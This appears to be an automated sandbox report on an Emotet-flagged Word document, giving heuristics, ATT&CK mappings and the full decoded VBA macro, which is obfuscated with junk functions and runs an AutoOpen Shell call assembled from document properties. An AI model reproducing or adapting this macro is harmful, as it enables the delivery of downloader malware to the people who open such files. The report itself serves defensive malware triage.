MALICIOUS
172
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6344335-3, indicating it's likely an Emotet variant. The presence of VBA macros, specifically an AutoOpen macro and a potential Shell call, strongly suggests the document is designed to execute malicious code upon opening. The extracted 'macros.bas' file contains obfuscated VBA code that likely attempts to download and execute a secondary payload, a common Emotet behavior.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6344335-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6344335-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Public Function BCncMKeTaxu() VBA.Shell$ "" + EAGSKppv + KTaypYC + axsYMxykHYh + sMBWFhBdc + cKSVAbGAb + fXzbvzZAyzX + XSDfpKa + ZbYzbUxFtd + VdAEpTTd + dBEbcfupVf + ActiveDocument.CustomDocumentProperties("TxBGeUh") + ActiveDocument.CustomDocumentProperties("hFsnTsFUk") + EAGSKppv + KTaypYC + axsYMxykHYh + sMBWFhBdc + cKSVAbGAb + fXzbvzZAyzX + XSDfpKa + ZbYzbUxFtd + VdAEpTTd + dBEbcfupVf + ActiveDocument.BuiltInDocumentProperties("Comments") + EAGSKppv + KTaypYC + axsYMxykHYh + sMBWFhBdc + cKSVAbGAb + fXzbvzZAyzX + XSDfpKa … End Function -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() BCncMKeTaxu -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7108 bytes |
SHA-256: ed89a80f04b4a4384a6db290d32aa512431d9ea6740312bccbbc86d20e8d291a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
131 of 173 identifiers look randomly generated (e.g. 'PKEYbTkxHTD') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Public Function wTVpCSRLX() As Integer
bNEEvYMWr = 9514
wcsHSgHhWXh = FVaBsNbDDxw
dtFSuVmwrvA = Asc(wcsHSgHhWXh)
If bNEEvYMWr > dtFSuVmwrvA Then
For wrpwYPVpB = 1131 To 6113
WuhbnYaxkGL = dtFSuVmwrvA + wrpwYPVpB
Next wrpwYPVpB
WuhbnYaxkGL = WuhbnYaxkGL + bNEEvYMWr
kevDzeFwG = CStr(WuhbnYaxkGL)
nvsuRhyKPE = Mid(kevDzeFwG, 2130, 6508)
KewtFsuKPTz = KewtFsuKPTz & "2258"
wTVpCSRLX = CInt(Mid(KewtFsuKPTz, 261, 6996))
Else
wTVpCSRLX = 7500 + 2302 + 5819 + 9753 / 2043 / 9584 - 295 - 7268 + 7230 + 1474
MsgBox ("wSTYeuckPL")
MsgBox ("UbHpYnaE")
End Function
Public Function MPsKUhbu() As Integer
pErVzdn = 2755
ggpRdRD = yXbUEyN
sBSPUDUHbx = Asc(ggpRdRD)
If pErVzdn > sBSPUDUHbx Then
For dycwZXp = 2055 To 8483
sxwVmsGTKRx = sBSPUDUHbx + dycwZXp
Next dycwZXp
sxwVmsGTKRx = sxwVmsGTKRx + pErVzdn
cDEnVSdgvWt = CStr(sxwVmsGTKRx)
DrXXkmBU = Mid(cDEnVSdgvWt, 225, 5795)
amWWBEwAR = amWWBEwAR & "9807"
MPsKUhbu = CInt(Mid(amWWBEwAR, 1860, 6056))
Else
MPsKUhbu = 6394 + 2439 + 3194 + 2107 / 8680 / 7193 / 9103 - 1432 - 7425 - 146 + 4046 + 6979
MsgBox ("fMnNbfGeHZu")
MsgBox ("UBauMpw")
End Function
Public Function GsYuuBuzg() As Integer
WYVHnRywDS = 2046
DDHYwXzn = VeHvXHxawTt
vVgHdNRdRST = Asc(DDHYwXzn)
If WYVHnRywDS > vVgHdNRdRST Then
For sXKxStht = 2599 To 6328
pXhmeHd = vVgHdNRdRST + sXKxStht
Next sXKxStht
pXhmeHd = pXhmeHd + WYVHnRywDS
NDGzWPya = CStr(pXhmeHd)
gehgMsxLupy = Mid(NDGzWPya, 1388, 7987)
ERbCvufCUH = ERbCvufCUH & "8767"
GsYuuBuzg = CInt(Mid(ERbCvufCUH, 2906, 9748))
Else
GsYuuBuzg = 9370 + 3397 + 1416 + 3417 / 6883 / 7289 / 6733 - 1094 - 9166 - 1951 + 373 + 87 + 7652
MsgBox ("eGRfWBVPHuM")
MsgBox ("EESugLNkCfC")
MsgBox ("ZgRdcEXDfgC")
MsgBox ("tKAwFfzy")
MsgBox ("btcUxDyFnLE")
End Function
Public Function rPVYKCCpe() As Integer
WSKeXvvzG = 64
GuzZCtvS = fDEPkSf
UFUtFETUWZh = Asc(GuzZCtvS)
If WSKeXvvzG > UFUtFETUWZh Then
For NNVFFhf = 2158 To 6664
vpBTwZnWyMp = UFUtFETUWZh + NNVFFhf
Next NNVFFhf
vpBTwZnWyMp = vpBTwZnWyMp + WSKeXvvzG
fTNcdHtY = CStr(vpBTwZnWyMp)
pwBtKGV = Mid(fTNcdHtY, 3228, 9610)
yAMnFfvvP = yAMnFfvvP & "330"
rPVYKCCpe = CInt(Mid(yAMnFfvvP, 158, 6624))
Else
rPVYKCCpe = 2702 + 7214 + 2627 + 5003 / 7758 / 9788 - 1224 - 7363 - 2881 + 3271 + 4672 + 6385
MsgBox ("rpmCTxPTge")
MsgBox ("zLTnNPVA")
MsgBox ("SzngFZNf")
MsgBox ("gnhTfTGgr")
MsgBox ("beuDhtz")
MsgBox ("TRFAbAmUX")
End Function
Public Function gyWvDvBX() As Integer
cmmPAVsE = 9299
ynnDxng = vuZwYgsgNh
hXaBVGczBp = Asc(ynnDxng)
If cmmPAVsE > hXaBVGczBp Then
For hDkgwdfE = 1906 To 5177
PXwKSKsDV = hXaBVGczBp + hDkgwdfE
Next hDkgwdfE
PXwKSKsDV = PXwKSKsDV + cmmPAVsE
cXnrdYv = CStr(PXwKSKsDV)
dWXPNxNwXBf = Mid(cXnrdYv, 1163, 3484)
PhYHrKxGX = PhYHrKxGX & "4249"
gyWvDvBX = CInt(Mid(PhYHrKxGX, 3298, 5188))
Else
gyWvDvBX = 7016 + 303 + 8962 + 1152 / 7157 / 4903 / 5452 - 112 - 4651 + 5503 + 4220 + 6480
MsgBox ("tdCeLpeNp")
MsgBox ("xNEyDAZ")
MsgBox ("mxhGNTfzK")
MsgBox ("tagtvPXw")
End Function
Sub autoopen()
BCncMKeTaxu
End Sub
Public Function BCncMKeTaxu()
VBA.Shell$ "" + EAGSKppv + KTaypYC + axsYMxykHYh + sMBWFhBdc + cKSVAbGAb + fXzbvzZAyzX + XSDfpKa + ZbYzbUxFtd + VdAEpTTd + dBEbcfupVf + ActiveDocument.CustomDocumentProperties("TxBGeUh") + ActiveDocument.CustomDocumentProperties("hFsnTsFUk") + EAGSKppv + KTaypYC + axsYMxykHYh + sMBWFhBdc + cKSVAbGAb + fXzbvzZAyzX + XSDfpKa + ZbYzbUxFtd + VdAEpTTd + dBEbcfupVf + ActiveDocument.BuiltInDocumentProperties("Comments") + EAGSKppv + KTaypYC + axsYMxykHYh + sMBWFhBdc + cKSVAbGAb + fXzbvzZAyzX + XSDfpKa + ZbYzbUxFtd + VdAEpTTd + dBEbcfupVf + uHUptErR, 0
End Function
Public Function GsDHVshxKud() As Integer
VkDxdUGHd = 5959
MwNadAG = xcBSBvVnFz
BEGUcSDmaLC = Asc(MwNadAG)
If VkDxdUGHd > BEGUcSDmaLC Then
For rtgkUtP = 2800 To 8534
aDLYMTTVATe = BEGUcSDmaLC + rtgkUtP
Next rtgkUtP
aDLYMTTVATe = aDLYMTTVATe + VkDxdUGHd
CczAcxeE = CStr(aDLYMTTVATe)
TBzwSHWSzb = Mid(CczAcxeE, 1725, 7972)
rFdfKsZa = rFdfKsZa & "8635"
GsDHVshxKud = CInt(Mid(rFdfKsZa, 430, 8132))
Else
GsDHVshxKud = 4361 + 2883 + 4888 + 2028 / 2763 / 4269 - 1023 - 1923 - 3123 + 2721 + 2605
MsgBox ("pbWFBUAKZe")
MsgBox ("XKukAYMzvhe")
MsgBox ("ChRSstzDXd")
MsgBox ("SGZTKyRRK")
MsgBox ("achVAZw")
End Function
Public Function nhULBwBdMeR() As Integer
ytsbzCnNPbv = 4868
EwSZkvv = wbLadYXRPM
vfNctwrZbfV = Asc(EwSZkvv)
If ytsbzCnNPbv > vfNctwrZbfV Then
For CTmDrDAAsr = 1438 To 6507
hUBcmYH = vfNctwrZbfV + CTmDrDAAsr
Next CTmDrDAAsr
hUBcmYH = hUBcmYH + ytsbzCnNPbv
UezEXxwk = CStr(hUBcmYH)
aAYNhYHfd = Mid(UezEXxwk, 1962, 5840)
zYuYHXfDuCG = zYuYHXfDuCG & "190"
nhULBwBdMeR = CInt(Mid(zYuYHXfDuCG, 243, 7589))
Else
nhULBwBdMeR = 7193 + 9570 + 6590 / 7314 / 3478 - 7894 - 1490 - 5804 + 3907 + 8456
MsgBox ("KteLXEVXdbM")
MsgBox ("vapGeUVC")
MsgBox ("ustFNGaS")
MsgBox ("seSLRLKeUNF")
End Function
Public Function aRrLexffA() As Integer
AfHLdgZ = 6836
PKEYbTkxHTD = EcPVuzRkAX
TxygkYyd = Asc(PKEYbTkxHTD)
If AfHLdgZ > TxygkYyd Then
For RZwUpKL = 516 To 3630
rHmzkVn = TxygkYyd + RZwUpKL
Next RZwUpKL
rHmzkVn = rHmzkVn + AfHLdgZ
BPHLtuuBZ = CStr(rHmzkVn)
YyykvLyyFpV = Mid(BPHLtuuBZ, 1309, 8350)
EAdtxRbE = EAdtxRbE & "9626"
aRrLexffA = CInt(Mid(EAdtxRbE, 2351, 8481))
Else
aRrLexffA = 815 + 1327 + 9410 / 3255 / 5629 / 1741 - 4361 - 5031 + 1968 + 8820
MsgBox ("CDLLpLs")
MsgBox ("eacZhfKdmHf")
MsgBox ("MDhnSmf")
MsgBox ("StMBApVxvpL")
MsgBox ("wGLUMVy")
End Function
Public Function YVctbxa() As Integer
FCrKRncB = 7116
uRuFZmhKz = VMXUmTc
KSeKMmm = Asc(uRuFZmhKz)
If FCrKRncB > KSeKMmm Then
For WZXaLWcS = 678 To 6175
WfRhYBK = KSeKMmm + WZXaLWcS
Next WZXaLWcS
WfRhYBK = WfRhYBK + FCrKRncB
GPHXPCW = CStr(WfRhYBK)
tTWGLMG = Mid(GPHXPCW, 1001, 5730)
FKTMFuNvhW = FKTMFuNvhW & "2209"
YVctbxa = CInt(Mid(FKTMFuNvhW, 1137, 7816))
Else
YVctbxa = 7539 + 2339 + 3932 + 648 / 4442 / 565 / 6384 - 9198 - 7174 - 4909 + 1953 + 6064
MsgBox ("UeHzBykbt")
MsgBox ("WFsgAvBp")
MsgBox ("faKgeBzk")
End Function
Public Function HhKvhZnVZWT() As Integer
wfrnunDztu = 1024
KfGhpNZWZ = XwRtaUTSmh
hyMvXFGPLbY = Asc(KfGhpNZWZ)
If wfrnunDztu > hyMvXFGPLbY Then
For TrmREeyX = 1489 To 7192
ngHPYYTbcEw = hyMvXFGPLbY + TrmREeyX
Next TrmREeyX
ngHPYYTbcEw = ngHPYYTbcEw + wfrnunDztu
BeZSZaWdT = CStr(ngHPYYTbcEw)
DwKVDdw = Mid(BeZSZaWdT, 1966, 4407)
nGfeMzpHU = nGfeMzpHU & "8134"
HhKvhZnVZWT = CInt(Mid(nGfeMzpHU, 1897, 8959))
Else
HhKvhZnVZWT = 5348 + 7196 + 7324 + 7843 / 2858 / 8464 - 1654 - 7082 - 5688 + 5362 + 6943
MsgBox ("xXuatBNvDm")
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.